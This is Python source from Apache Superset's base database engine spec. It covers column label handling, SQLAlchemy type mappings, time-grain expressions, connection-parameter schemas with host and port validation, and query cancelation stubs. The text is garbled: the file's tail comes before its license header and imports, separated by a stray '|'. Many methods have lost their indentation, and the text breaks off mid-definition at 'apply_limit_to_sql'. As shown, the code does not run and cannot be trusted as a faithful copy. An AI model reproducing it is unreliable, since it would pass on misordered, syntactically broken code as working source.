    and query results have same case. Otherwise, return the mutated label as a
    regular string. If maximum supported column name length is exceeded,
    generate a truncated label by calling truncate_label().

    :param label: expected expression label/alias
    :return: conditionally mutated label supported by the db engine
    """
    label_mutated = cls._mutate_label(label)
    if (
        cls.max_column_name_length
        and len(label_mutated) > cls.max_column_name_length
    ):
        # NOTE: truncation is applied to the original label, not the mutated
        # one, so the hash is deterministic for a given input label.
        label_mutated = cls._truncate_label(label)
    if cls.force_column_alias_quotes:
        label_mutated = quoted_name(label_mutated, True)
    return label_mutated
@classmethod
def get_sqla_column_type(
    cls,
    column_type: Optional[str],
    column_type_mappings: Tuple[ColumnTypeMapping, ...] = column_type_mappings,
) -> Optional[Tuple[TypeEngine, GenericDataType]]:
    """
    Return a sqlalchemy native column type that corresponds to the column type
    defined in the data source (return None to use default type inferred by
    SQLAlchemy). Override `column_type_mappings` for specific needs
    (see MSSQL for example of NCHAR/NVARCHAR handling).

    :param column_type: Column type returned by inspector
    :param column_type_mappings: Maps from string to SqlAlchemy TypeEngine
    :return: SqlAlchemy column type, or None if no mapping matches
    """
    if not column_type:
        return None
    # First mapping whose pattern matches the native type wins.
    for pattern, sqla_type, generic_type in column_type_mappings:
        match = pattern.match(column_type)
        if match:
            # A callable entry is a factory building the type from the
            # regex match (e.g. parameterized/sized types).
            resolved = sqla_type(match) if callable(sqla_type) else sqla_type
            return resolved, generic_type
    return None
@staticmethod
def _mutate_label(label: str) -> str:
    """
    Most engines support mixed case aliases that can include numbers
    and special characters, like commas, parentheses etc. For engines that
    have restrictions on what types of aliases are supported, this method
    can be overridden to ensure that labels conform to the engine's
    limitations. Mutated labels should be deterministic (input label A always
    yields output label X) and unique (input labels A and B don't yield the same
    output label X).

    :param label: Preferred expression label
    :return: Conditionally mutated label
    """
    # Identity by default; restrictive engines override this.
    return label
@classmethod
def _truncate_label(cls, label: str) -> str:
    """
    In the case that a label exceeds the max length supported by the engine,
    this method is used to construct a deterministic and unique label based on
    the original label. By default, this returns a md5 hash of the original label,
    conditionally truncated if the length of the hash exceeds the max column length
    of the engine.

    :param label: Expected expression label
    :return: Truncated label
    """
    # Replace the label with a deterministic digest of itself.
    label = md5_sha_from_str(label)
    # truncate hash if it exceeds max length
    if cls.max_column_name_length and len(label) > cls.max_column_name_length:
        label = label[: cls.max_column_name_length]
    return label
@classmethod
def column_datatype_to_string(
cls, sqla_column_type: TypeEngine, dialect: Dialect
) -> str:
"""
Convert sqlalchemy column type to string representation.
By default, removes collation and character encoding info to avoid
unnecessarily long datatypes.
:param sqla_column_type: SqlAlchemy column type
:param dialect: Sqlalchemy dialect
:return: Compiled column type
"""
sqla_column_type = sqla_column_type.copy()
if hasattr(sqla_column_type, "collation"):
sqla_column_type.collation = None
if hasattr(sqla_column_type, "charset"):
sqla_column_type.charset = None
return sqla_column_type.compile(dialect=dialect).upper()
@classmethod
def get_function_names(  # pylint: disable=unused-argument
    cls, database: "Database",
) -> List[str]:
    """
    Get a list of function names that are able to be called on the database.
    Used for SQL Lab autocomplete.

    :param database: The database to get functions for
    :return: A list of function names useable in the database
    """
    # No engine-agnostic way to enumerate functions; subclasses override.
    return []
@staticmethod
def pyodbc_rows_to_tuples(data: List[Any]) -> List[Tuple[Any, ...]]:
"""
Convert pyodbc.Row objects from `fetch_data` to tuples.
:param data: List of tuples or pyodbc.Row objects
:return: List of tuples
"""
if data and type(data[0]).__name__ == "Row":
data = [tuple(row) for row in data]
return data
@staticmethod
def mutate_db_for_connection_test(  # pylint: disable=unused-argument
    database: "Database",
) -> None:
    """
    Some databases require passing additional parameters for validating database
    connections. This method makes it possible to mutate the database instance prior
    to testing if a connection is ok.

    :param database: instance to be mutated
    """
    # No-op by default; engines needing test-time tweaks override this.
    return None
@staticmethod
def get_extra_params(database: "Database") -> Dict[str, Any]:
"""
Some databases require adding elements to connection parameters,
like passing certificates to `extra`. This can be done here.
:param database: database instance from which to extract extras
:raises CertificateException: If certificate is not valid/unparseable
"""
extra: Dict[str, Any] = {}
if database.extra:
try:
extra = json.loads(database.extra)
except json.JSONDecodeError as ex:
logger.error(ex, exc_info=True)
raise ex
return extra
@staticmethod
def update_encrypted_extra_params(
database: "Database", params: Dict[str, Any]
) -> None:
"""
Some databases require some sensitive information which do not conform to
the username:password syntax normally used by SQLAlchemy.
:param database: database instance from which to extract extras
:param params: params to be updated
"""
if not database.encrypted_extra:
return
try:
encrypted_extra = json.loads(database.encrypted_extra)
params.update(encrypted_extra)
except json.JSONDecodeError as ex:
logger.error(ex, exc_info=True)
raise ex
@classmethod
def is_readonly_query(cls, parsed_query: ParsedQuery) -> bool:
"""Pessimistic readonly, 100% sure statement won't mutate anything"""
return (
parsed_query.is_select()
or parsed_query.is_explain()
or parsed_query.is_show()
)
@classmethod
def is_select_query(cls, parsed_query: ParsedQuery) -> bool:
"""
Determine if the statement should be considered as SELECT statement.
Some query dialects do not contain "SELECT" word in queries (eg. Kusto)
"""
return parsed_query.is_select()
@classmethod
def get_column_spec(  # pylint: disable=unused-argument
    cls,
    native_type: Optional[str],
    db_extra: Optional[Dict[str, Any]] = None,
    source: utils.ColumnTypeSource = utils.ColumnTypeSource.GET_TABLE,
    column_type_mappings: Tuple[ColumnTypeMapping, ...] = column_type_mappings,
) -> Optional[ColumnSpec]:
    """
    Converts native database type to sqlalchemy column type.

    :param native_type: Native database type
    :param db_extra: The database extra object
    :param source: Type coming from the database table or cursor description
    :param column_type_mappings: Maps from string to SqlAlchemy TypeEngine
    :return: ColumnSpec object, or None if the native type has no mapping
    """
    col_types = cls.get_sqla_column_type(
        native_type, column_type_mappings=column_type_mappings
    )

    if col_types:
        column_type, generic_type = col_types
        # wrap temporal types in custom type that supports literal binding
        # using datetimes
        if generic_type == GenericDataType.TEMPORAL:
            column_type = literal_dttm_type_factory(
                column_type, cls, native_type or "", db_extra=db_extra or {}
            )
        is_dttm = generic_type == GenericDataType.TEMPORAL
        return ColumnSpec(
            sqla_type=column_type, generic_type=generic_type, is_dttm=is_dttm
        )
    return None
@classmethod
def has_implicit_cancel(cls) -> bool:
    """
    Return True if the live cursor handles the implicit cancelation of the query,
    False otherise.

    :return: Whether the live cursor implicitly cancels the query
    :see: handle_cursor
    """
    # Engines whose drivers cancel on cursor close override this.
    return False
@classmethod
def get_cancel_query_id(  # pylint: disable=unused-argument
    cls, cursor: Any, query: Query,
) -> Optional[str]:
    """
    Select identifiers from the database engine that uniquely identifies the
    queries to cancel. The identifier is typically a session id, process id
    or similar.

    :param cursor: Cursor instance in which the query will be executed
    :param query: Query instance
    :return: Query identifier; ``None`` means cancelation is unsupported
    """
    return None
@classmethod
def cancel_query(  # pylint: disable=unused-argument
    cls, cursor: Any, query: Query, cancel_query_id: str,
) -> bool:
    """
    Cancel query in the underlying database.

    :param cursor: New cursor instance to the db of the query
    :param query: Query instance
    :param cancel_query_id: Value returned by get_cancel_query_payload or set in
    other life-cycle methods of the query
    :return: True if query cancelled successfully, False otherwise
    """
    # Base implementation cannot cancel anything.
    return False
@classmethod
def parse_sql(cls, sql: str) -> List[str]:
    """Split *sql* into statements, stripped of whitespace and semicolons."""
    return [str(s).strip(" ;") for s in sqlparse.parse(sql)]
# schema for adding a database by providing parameters instead of the
# full SQLAlchemy URI
class BasicParametersSchema(Schema):
    """Marshmallow schema for the individual connection parameters."""

    username = fields.String(required=True, allow_none=True, description=__("Username"))
    password = fields.String(allow_none=True, description=__("Password"))
    host = fields.String(required=True, description=__("Hostname or IP address"))
    # Port 0 is allowed; 65536 is excluded (max_inclusive=False).
    port = fields.Integer(
        required=True,
        description=__("Database port"),
        validate=Range(min=0, max=2 ** 16, max_inclusive=False),
    )
    database = fields.String(required=True, description=__("Database name"))
    # Free-form key/value pairs appended to the URI query string.
    query = fields.Dict(
        keys=fields.Str(), values=fields.Raw(), description=__("Additional parameters")
    )
    encryption = fields.Boolean(
        required=False, description=__("Use an encrypted connection to the database")
    )
class BasicParametersType(TypedDict, total=False):
    """Connection parameters accepted by BasicParametersMixin (all keys optional)."""

    username: Optional[str]
    password: Optional[str]
    host: str
    port: int
    database: str
    # extra query-string arguments for the SQLAlchemy URI
    query: Dict[str, Any]
    # whether to request an encrypted connection
    encryption: bool
class BasicParametersMixin:
    """
    Mixin for configuring DB engine specs via a dictionary.

    With this mixin the SQLAlchemy engine can be configured through
    individual parameters, instead of the full SQLAlchemy URI. This
    mixin is for the most common pattern of URI:

        engine+driver://user:password@host:port/dbname[?key=value&key=value...]
    """

    # schema describing the parameters used to configure the DB
    parameters_schema = BasicParametersSchema()

    # recommended driver name for the DB engine spec
    default_driver = ""

    # placeholder with the SQLAlchemy URI template
    sqlalchemy_uri_placeholder = (
        "engine+driver://user:password@host:port/dbname[?key=value&key=value...]"
    )

    # query parameter(s) to enable encryption in the database connection;
    # for Postgres this would be `{"sslmode": "verify-ca"}`, e.g.
    encryption_parameters: Dict[str, str] = {}
@classmethod
def build_sqlalchemy_uri(  # pylint: disable=unused-argument
    cls,
    parameters: BasicParametersType,
    encryted_extra: Optional[Dict[str, str]] = None,
) -> str:
    """
    Build a SQLAlchemy URI string from individual connection parameters.

    :param parameters: connection parameters (host, port, credentials, ...)
    :param encryted_extra: unused here; NOTE(review): the parameter name is
        misspelled ("encryted") — kept as-is since callers may pass it by
        keyword, so renaming would break them
    :return: rendered SQLAlchemy URI
    :raises Exception: if encryption is requested but the engine spec defines
        no encryption parameters
    """
    # make a copy so that we don't update the original
    query = parameters.get("query", {}).copy()
    if parameters.get("encryption"):
        if not cls.encryption_parameters:
            raise Exception("Unable to build a URL with encryption enabled")
        query.update(cls.encryption_parameters)

    return str(
        URL(
            # rstrip drops the trailing "+" when default_driver is empty
            f"{cls.engine}+{cls.default_driver}".rstrip("+"),  # type: ignore
            username=parameters.get("username"),
            password=parameters.get("password"),
            host=parameters["host"],
            port=parameters["port"],
            database=parameters["database"],
            query=query,
        )
    )
@classmethod
def get_parameters_from_uri(  # pylint: disable=unused-argument
    cls, uri: str, encrypted_extra: Optional[Dict[str, Any]] = None
) -> BasicParametersType:
    """
    Decompose a SQLAlchemy URI into its individual connection parameters.

    Query arguments that merely enable encryption are folded into the
    boolean ``encryption`` flag instead of being reported verbatim.
    """
    url = make_url(uri)
    encryption_items = cls.encryption_parameters.items()
    query = {
        key: value
        for key, value in url.query.items()
        if (key, value) not in encryption_items
    }
    encryption = all(item in url.query.items() for item in encryption_items)
    return {
        "username": url.username,
        "password": url.password,
        "host": url.host,
        "port": url.port,
        "database": url.database,
        "query": query,
        "encryption": encryption,
    }
@classmethod
def validate_parameters(
    cls, parameters: BasicParametersType
) -> List[SupersetError]:
    """
    Validates any number of parameters, for progressive validation.

    If only the hostname is present it will check if the name is resolvable. As more
    parameters are present in the request, more validation is done.

    :param parameters: partial or complete connection parameters
    :return: list of validation errors; empty when everything checks out
    """
    errors: List[SupersetError] = []

    required = {"host", "port", "username", "database"}
    # Only parameters carrying a truthy value count as present.
    present = {key for key in parameters if parameters.get(key, ())}
    missing = sorted(required - present)

    if missing:
        errors.append(
            SupersetError(
                # Inner quotes must differ from the f-string's own quotes:
                # reusing the same quote character inside the expression is a
                # SyntaxError before Python 3.12.
                message=f'One or more parameters are missing: {", ".join(missing)}',
                error_type=SupersetErrorType.CONNECTION_MISSING_PARAMETERS_ERROR,
                level=ErrorLevel.WARNING,
                extra={"missing": missing},
            ),
        )

    host = parameters.get("host", None)
    if not host:
        return errors
    if not is_hostname_valid(host):
        errors.append(
            SupersetError(
                message="The hostname provided can't be resolved.",
                error_type=SupersetErrorType.CONNECTION_INVALID_HOSTNAME_ERROR,
                level=ErrorLevel.ERROR,
                extra={"invalid": ["host"]},
            ),
        )
        return errors

    port = parameters.get("port", None)
    if not port:
        return errors
    try:
        port = int(port)
    except (ValueError, TypeError):
        errors.append(
            SupersetError(
                message="Port must be a valid integer.",
                error_type=SupersetErrorType.CONNECTION_INVALID_PORT_ERROR,
                level=ErrorLevel.ERROR,
                extra={"invalid": ["port"]},
            ),
        )
    # If int() failed above, port is still a string and this range check
    # also fails, producing the out-of-range error as well (pre-existing
    # progressive-validation behavior).
    if not (isinstance(port, int) and 0 <= port < 2 ** 16):
        errors.append(
            SupersetError(
                message=(
                    "The port must be an integer between 0 and 65535 "
                    "(inclusive)."
                ),
                error_type=SupersetErrorType.CONNECTION_INVALID_PORT_ERROR,
                level=ErrorLevel.ERROR,
                extra={"invalid": ["port"]},
            ),
        )
    elif not is_port_open(host, port):
        errors.append(
            SupersetError(
                message="The port is closed.",
                error_type=SupersetErrorType.CONNECTION_PORT_CLOSED_ERROR,
                level=ErrorLevel.ERROR,
                extra={"invalid": ["port"]},
            ),
        )

    return errors
@classmethod
def parameters_json_schema(cls) -> Any:
"""
Return configuration parameters as OpenAPI.
"""
if not cls.parameters_schema:
return None
spec = APISpec(
title="Database Parameters",
version="1.0.0",
openapi_version="3.0.2",
plugins=[MarshmallowPlugin()],
)
spec.components.schema(cls.__name__, schema=cls.parameters_schema)
return spec.to_dict()["components"]["schemas"][cls.__name__]
| # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=too-many-lines
import json
import logging
import re
from contextlib import closing
from datetime import datetime
from typing import (
Any,
Callable,
Dict,
List,
Match,
NamedTuple,
Optional,
Pattern,
Set,
Tuple,
Type,
TYPE_CHECKING,
Union,
)
import pandas as pd
import sqlparse
from apispec import APISpec
from apispec.ext.marshmallow import MarshmallowPlugin
from flask import current_app, g
from flask_babel import gettext as __, lazy_gettext as _
from marshmallow import fields, Schema
from marshmallow.validate import Range
from sqlalchemy import column, select, types
from sqlalchemy.engine.base import Engine
from sqlalchemy.engine.interfaces import Compiled, Dialect
from sqlalchemy.engine.reflection import Inspector
from sqlalchemy.engine.url import make_url, URL
from sqlalchemy.ext.compiler import compiles
from sqlalchemy.orm import Session
from sqlalchemy.sql import quoted_name, text
from sqlalchemy.sql.expression import ColumnClause, Select, TextAsFrom, TextClause
from sqlalchemy.types import TypeEngine
from typing_extensions import TypedDict
from superset import security_manager, sql_parse
from superset.errors import ErrorLevel, SupersetError, SupersetErrorType
from superset.models.sql_lab import Query
from superset.models.sql_types.base import literal_dttm_type_factory
from superset.sql_parse import ParsedQuery, Table
from superset.utils import core as utils
from superset.utils.core import ColumnSpec, GenericDataType
from superset.utils.hashing import md5_sha_from_str
from superset.utils.network import is_hostname_valid, is_port_open
if TYPE_CHECKING:
# prevent circular imports
from superset.connectors.sqla.models import TableColumn
from superset.models.core import Database
# (regex, SQLAlchemy type or factory from the regex match, generic data type)
# triple used to map database-specific type strings to SQLAlchemy types.
ColumnTypeMapping = Tuple[
    Pattern[str],
    Union[TypeEngine, Callable[[Match[str]], TypeEngine]],
    GenericDataType,
]
logger = logging.getLogger()  # NOTE(review): root logger; `getLogger(__name__)` is conventional — confirm intent
class TimeGrain(NamedTuple):
    """A single time-grain option: name, localized label, SQL expression
    template and ISO 8601 duration."""

    name: str  # TODO: redundant field, remove
    label: str  # localized, user-facing label
    function: str  # SQL expression template with "{col}" placeholder
    duration: Optional[str]  # ISO 8601 duration, e.g. "P1D"; None = original value
# Mapping from ISO 8601 duration (None = no grain applied) to the localized
# label shown in the UI for each builtin time grain.
builtin_time_grains: Dict[Optional[str], str] = {
    None: __("Original value"),
    "PT1S": __("Second"),
    "PT5S": __("5 second"),
    "PT30S": __("30 second"),
    "PT1M": __("Minute"),
    "PT5M": __("5 minute"),
    "PT10M": __("10 minute"),
    "PT15M": __("15 minute"),
    "PT30M": __("30 minute"),
    "PT1H": __("Hour"),
    "PT6H": __("6 hour"),
    "P1D": __("Day"),
    "P1W": __("Week"),
    "P1M": __("Month"),
    "P3M": __("Quarter"),
    "P1Y": __("Year"),
    "1969-12-28T00:00:00Z/P1W": __("Week starting Sunday"),
    "1969-12-29T00:00:00Z/P1W": __("Week starting Monday"),
    "P1W/1970-01-03T00:00:00Z": __("Week ending Saturday"),
    # Fixed label: was "Week_ending Sunday" — stray underscore in the
    # user-facing/translatable string, inconsistent with the entry above.
    "P1W/1970-01-04T00:00:00Z": __("Week ending Sunday"),
}
class TimestampExpression(ColumnClause):  # pylint: disable=abstract-method
    def __init__(self, expr: str, col: ColumnClause, **kwargs: Any) -> None:
        """Sqlalchemy class that can be used to render native column elements
        respecting engine-specific quoting rules as part of a string-based expression.

        :param expr: Sql expression with '{col}' denoting the locations where the col
        object will be rendered.
        :param col: the target column
        """
        super().__init__(expr, **kwargs)
        self.col = col

    @property
    def _constructor(self) -> ColumnClause:
        # Needed to ensure that the column label is rendered correctly when
        # proxied to the outer query.
        # See https://github.com/sqlalchemy/sqlalchemy/issues/4730
        return ColumnClause
@compiles(TimestampExpression)
def compile_timegrain_expression(
    element: TimestampExpression, compiler: Compiled, **kwargs: Any
) -> str:
    """Render a TimestampExpression by substituting the compiled target column
    for the "{col}" placeholder in the grain expression."""
    return element.name.replace("{col}", compiler.process(element.col, **kwargs))
class LimitMethod:  # pylint: disable=too-few-public-methods
    """Enum the ways that limits can be applied"""

    FETCH_MANY = "fetch_many"  # cap rows via cursor.fetchmany(limit)
    WRAP_SQL = "wrap_sql"  # wrap the query in an outer SELECT ... LIMIT
    FORCE_LIMIT = "force_limit"  # rewrite/insert the LIMIT clause in the SQL text
class BaseEngineSpec:  # pylint: disable=too-many-public-methods
    """Abstract class for database engine specific configurations.

    Subclasses customize SQL generation, metadata introspection and error
    handling per database engine.

    Attributes:
        allows_alias_to_source_column: Whether the engine is able to pick the
                                       source column for aggregation clauses
                                       used in ORDER BY when a column in SELECT
                                       has an alias that is the same as a source
                                       column.
        allows_hidden_orderby_agg:     Whether the engine allows ORDER BY to
                                       directly use aggregation clauses, without
                                       having to add the same aggregation in SELECT.
    """
engine = "base" # str as defined in sqlalchemy.engine.engine
engine_aliases: Set[str] = set()
engine_name: Optional[str] = None # for user messages, overridden in child classes
_date_trunc_functions: Dict[str, str] = {}
_time_grain_expressions: Dict[Optional[str], str] = {}
column_type_mappings: Tuple[ColumnTypeMapping, ...] = (
(
re.compile(r"^string", re.IGNORECASE),
types.String(),
GenericDataType.STRING,
),
(
re.compile(r"^n((var)?char|text)", re.IGNORECASE),
types.UnicodeText(),
GenericDataType.STRING,
),
(
re.compile(r"^(var)?char", re.IGNORECASE),
types.String(),
GenericDataType.STRING,
),
(
re.compile(r"^(tiny|medium|long)?text", re.IGNORECASE),
types.String(),
GenericDataType.STRING,
),
(
re.compile(r"^smallint", re.IGNORECASE),
types.SmallInteger(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^int(eger)?", re.IGNORECASE),
types.Integer(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^bigint", re.IGNORECASE),
types.BigInteger(),
GenericDataType.NUMERIC,
),
(re.compile(r"^long", re.IGNORECASE), types.Float(), GenericDataType.NUMERIC,),
(
re.compile(r"^decimal", re.IGNORECASE),
types.Numeric(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^numeric", re.IGNORECASE),
types.Numeric(),
GenericDataType.NUMERIC,
),
(re.compile(r"^float", re.IGNORECASE), types.Float(), GenericDataType.NUMERIC,),
(
re.compile(r"^double", re.IGNORECASE),
types.Float(),
GenericDataType.NUMERIC,
),
(re.compile(r"^real", re.IGNORECASE), types.REAL, GenericDataType.NUMERIC,),
(
re.compile(r"^smallserial", re.IGNORECASE),
types.SmallInteger(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^serial", re.IGNORECASE),
types.Integer(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^bigserial", re.IGNORECASE),
types.BigInteger(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^money", re.IGNORECASE),
types.Numeric(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^timestamp", re.IGNORECASE),
types.TIMESTAMP(),
GenericDataType.TEMPORAL,
),
(
re.compile(r"^datetime", re.IGNORECASE),
types.DateTime(),
GenericDataType.TEMPORAL,
),
(
re.compile(r"^date", re.IGNORECASE),
types.DateTime(),
GenericDataType.TEMPORAL,
),
(re.compile(r"^time", re.IGNORECASE), types.Time(), GenericDataType.TEMPORAL,),
(
re.compile(r"^interval", re.IGNORECASE),
types.Interval(),
GenericDataType.TEMPORAL,
),
(
re.compile(r"^bool(ean)?", re.IGNORECASE),
types.Boolean(),
GenericDataType.BOOLEAN,
),
)
# Does database support join-free timeslot grouping
time_groupby_inline = False
limit_method = LimitMethod.FORCE_LIMIT
time_secondary_columns = False
allows_joins = True
allows_subqueries = True
allows_alias_in_select = True
allows_alias_in_orderby = True
allows_sql_comments = True
allows_escaped_colons = True
# Whether ORDER BY clause can use aliases created in SELECT
# that are the same as a source column
allows_alias_to_source_column = True
# Whether ORDER BY clause must appear in SELECT
# if TRUE, then it doesn't have to.
allows_hidden_ordeby_agg = True
# Whether ORDER BY clause can use sql caculated expression
# if True, use alias of select column for `order by`
# the True is safely for most database
# But for backward compatibility, False by default
allows_hidden_cc_in_orderby = False
force_column_alias_quotes = False
arraysize = 0
max_column_name_length = 0
try_remove_schema_from_table_name = True # pylint: disable=invalid-name
run_multiple_statements_as_one = False
custom_errors: Dict[
Pattern[str], Tuple[str, SupersetErrorType, Dict[str, Any]]
] = {}
@classmethod
def get_dbapi_exception_mapping(cls) -> Dict[Type[Exception], Type[Exception]]:
"""
Each engine can implement and converge its own specific exceptions into
Superset DBAPI exceptions
Note: On python 3.9 this method can be changed to a classmethod property
without the need of implementing a metaclass type
:return: A map of driver specific exception to superset custom exceptions
"""
return {}
@classmethod
def get_dbapi_mapped_exception(cls, exception: Exception) -> Exception:
"""
Get a superset custom DBAPI exception from the driver specific exception.
Override if the engine needs to perform extra changes to the exception, for
example change the exception message or implement custom more complex logic
:param exception: The driver specific exception
:return: Superset custom DBAPI exception
"""
new_exception = cls.get_dbapi_exception_mapping().get(type(exception))
if not new_exception:
return exception
return new_exception(str(exception))
@classmethod
def get_allow_cost_estimate( # pylint: disable=unused-argument
cls, extra: Dict[str, Any],
) -> bool:
return False
@classmethod
def get_text_clause(cls, clause: str) -> TextClause:
"""
SQLALchemy wrapper to ensure text clauses are escaped properly
:param clause: string clause with potentially unescaped characters
:return: text clause with escaped characters
"""
if cls.allows_escaped_colons:
clause = clause.replace(":", "\\:")
return text(clause)
@classmethod
def get_engine(
cls,
database: "Database",
schema: Optional[str] = None,
source: Optional[utils.QuerySource] = None,
) -> Engine:
user_name = utils.get_username()
return database.get_sqla_engine(
schema=schema, nullpool=True, user_name=user_name, source=source
)
    @classmethod
    def get_timestamp_expr(
        cls,
        col: ColumnClause,
        pdf: Optional[str],
        time_grain: Optional[str],
        type_: Optional[str] = None,
    ) -> TimestampExpression:
        """
        Construct a TimestampExpression to be used in a SQLAlchemy query.

        :param col: Target column for the TimestampExpression
        :param pdf: date format (seconds or milliseconds)
        :param time_grain: time grain, e.g. P1Y for 1 year
        :param type_: the source column type
        :return: TimestampExpression object
        """
        if time_grain:
            time_expr = cls.get_time_grain_expressions().get(time_grain)
            if not time_expr:
                raise NotImplementedError(
                    f"No grain spec for {time_grain} for database {cls.engine}"
                )
            # Substitute the engine's type-specific date-trunc function for the
            # optional "{func}" placeholder in the grain expression.
            if type_ and "{func}" in time_expr:
                date_trunc_function = cls._date_trunc_functions.get(type_)
                if date_trunc_function:
                    time_expr = time_expr.replace("{func}", date_trunc_function)
            # "{type}" is replaced with the raw column type, but only for types
            # that have a registered date-trunc function.
            if type_ and "{type}" in time_expr:
                date_trunc_function = cls._date_trunc_functions.get(type_)
                if date_trunc_function:
                    time_expr = time_expr.replace("{type}", type_)
        else:
            time_expr = "{col}"
        # if epoch, translate to DATE using db specific conf
        if pdf == "epoch_s":
            time_expr = time_expr.replace("{col}", cls.epoch_to_dttm())
        elif pdf == "epoch_ms":
            time_expr = time_expr.replace("{col}", cls.epoch_ms_to_dttm())
        return TimestampExpression(time_expr, col, type_=col.type)
@classmethod
def get_time_grains(cls) -> Tuple[TimeGrain, ...]:
"""
Generate a tuple of supported time grains.
:return: All time grains supported by the engine
"""
ret_list = []
time_grains = builtin_time_grains.copy()
time_grains.update(current_app.config["TIME_GRAIN_ADDONS"])
for duration, func in cls.get_time_grain_expressions().items():
if duration in time_grains:
name = time_grains[duration]
ret_list.append(TimeGrain(name, _(name), func, duration))
return tuple(ret_list)
    @classmethod
    def _sort_time_grains(
        cls, val: Tuple[Optional[str], str], index: int
    ) -> Union[float, int, str]:
        """
        Return an ordered time-based value of a portion of a time grain
        for sorting
        Values are expected to be either None or start with P or PT
        Have a numerical value in the middle and end with
        a value for the time interval
        It can also start or end with epoch start time denoting a range
        i.e, week beginning or ending with a day

        :param val: (duration, expression) item from the grain dict
        :param index: which sort dimension to compute (0..3)
        """
        # Relative ordering buckets used by the individual sort dimensions.
        pos = {
            "FIRST": 0,
            "SECOND": 1,
            "THIRD": 2,
            "LAST": 3,
        }

        if val[0] is None:
            return pos["FIRST"]

        # groups: (1) epoch prefix, (2) P/PT, (3) magnitude, (4) unit, (5) epoch suffix
        prog = re.compile(r"(.*\/)?(P|PT)([0-9\.]+)(S|M|H|D|W|M|Y)(\/.*)?")
        result = prog.match(val[0])

        # for any time grains that don't match the format, put them at the end
        if result is None:
            return pos["LAST"]

        second_minute_hour = ["S", "M", "H"]
        day_week_month_year = ["D", "W", "M", "Y"]
        is_less_than_day = result.group(2) == "PT"
        interval = result.group(4)
        epoch_time_start_string = result.group(1) or result.group(5)
        has_starting_or_ending = bool(len(epoch_time_start_string or ""))

        def sort_day_week() -> int:
            # Week starting/ending variants always sort after plain grains.
            if has_starting_or_ending:
                return pos["LAST"]
            if is_less_than_day:
                return pos["SECOND"]
            return pos["THIRD"]

        def sort_interval() -> float:
            # Order units within their own group (e.g. "D" before "W").
            if is_less_than_day:
                return second_minute_hour.index(interval)
            return day_week_month_year.index(interval)

        # 0: all "PT" values should come before "P" values (i.e, PT10M)
        # 1: order values within the above arrays ("D" before "W")
        # 2: sort by numeric value (PT10M before PT15M)
        # 3: sort by any week starting/ending values
        plist = {
            0: sort_day_week(),
            1: pos["SECOND"] if is_less_than_day else pos["THIRD"],
            2: sort_interval(),
            3: float(result.group(3)),
        }

        return plist.get(index, 0)
@classmethod
def get_time_grain_expressions(cls) -> Dict[Optional[str], str]:
"""
Return a dict of all supported time grains including any potential added grains
but excluding any potentially disabled grains in the config file.
:return: All time grain expressions supported by the engine
"""
# TODO: use @memoize decorator or similar to avoid recomputation on every call
time_grain_expressions = cls._time_grain_expressions.copy()
grain_addon_expressions = current_app.config["TIME_GRAIN_ADDON_EXPRESSIONS"]
time_grain_expressions.update(grain_addon_expressions.get(cls.engine, {}))
denylist: List[str] = current_app.config["TIME_GRAIN_DENYLIST"]
for key in denylist:
time_grain_expressions.pop(key)
return dict(
sorted(
time_grain_expressions.items(),
key=lambda x: (
cls._sort_time_grains(x, 0),
cls._sort_time_grains(x, 1),
cls._sort_time_grains(x, 2),
cls._sort_time_grains(x, 3),
),
)
)
@classmethod
def fetch_data(
cls, cursor: Any, limit: Optional[int] = None
) -> List[Tuple[Any, ...]]:
"""
:param cursor: Cursor instance
:param limit: Maximum number of rows to be returned by the cursor
:return: Result of query
"""
if cls.arraysize:
cursor.arraysize = cls.arraysize
try:
if cls.limit_method == LimitMethod.FETCH_MANY and limit:
return cursor.fetchmany(limit)
return cursor.fetchall()
except Exception as ex:
raise cls.get_dbapi_mapped_exception(ex)
@classmethod
def expand_data(
cls, columns: List[Dict[Any, Any]], data: List[Dict[Any, Any]]
) -> Tuple[List[Dict[Any, Any]], List[Dict[Any, Any]], List[Dict[Any, Any]]]:
"""
Some engines support expanding nested fields. See implementation in Presto
spec for details.
:param columns: columns selected in the query
:param data: original data set
:return: list of all columns(selected columns and their nested fields),
expanded data set, listed of nested fields
"""
return columns, data, []
@classmethod
def alter_new_orm_column(cls, orm_col: "TableColumn") -> None:
"""Allow altering default column attributes when first detected/added
For instance special column like `__time` for Druid can be
set to is_dttm=True. Note that this only gets called when new
columns are detected/created"""
# TODO: Fix circular import caused by importing TableColumn
@classmethod
def epoch_to_dttm(cls) -> str:
"""
SQL expression that converts epoch (seconds) to datetime that can be used in a
query. The reference column should be denoted as `{col}` in the return
expression, e.g. "FROM_UNIXTIME({col})"
:return: SQL Expression
"""
raise NotImplementedError()
@classmethod
def epoch_ms_to_dttm(cls) -> str:
"""
SQL expression that converts epoch (milliseconds) to datetime that can be used
in a query.
:return: SQL Expression
"""
return cls.epoch_to_dttm().replace("{col}", "({col}/1000)")
@classmethod
def get_datatype(cls, type_code: Any) -> Optional[str]:
"""
Change column type code from cursor description to string representation.
:param type_code: Type code from cursor description
:return: String representation of type code
"""
if isinstance(type_code, str) and type_code != "":
return type_code.upper()
return None
@classmethod
def normalize_indexes(cls, indexes: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
"""
Normalizes indexes for more consistency across db engines
noop by default
:param indexes: Raw indexes as returned by SQLAlchemy
:return: cleaner, more aligned index definition
"""
return indexes
@classmethod
def extra_table_metadata( # pylint: disable=unused-argument
cls, database: "Database", table_name: str, schema_name: str,
) -> Dict[str, Any]:
"""
Returns engine-specific table metadata
:param database: Database instance
:param table_name: Table name
:param schema_name: Schema name
:return: Engine-specific table metadata
"""
# TODO: Fix circular import caused by importing Database
return {}
@classmethod
def apply_limit_to_sql(
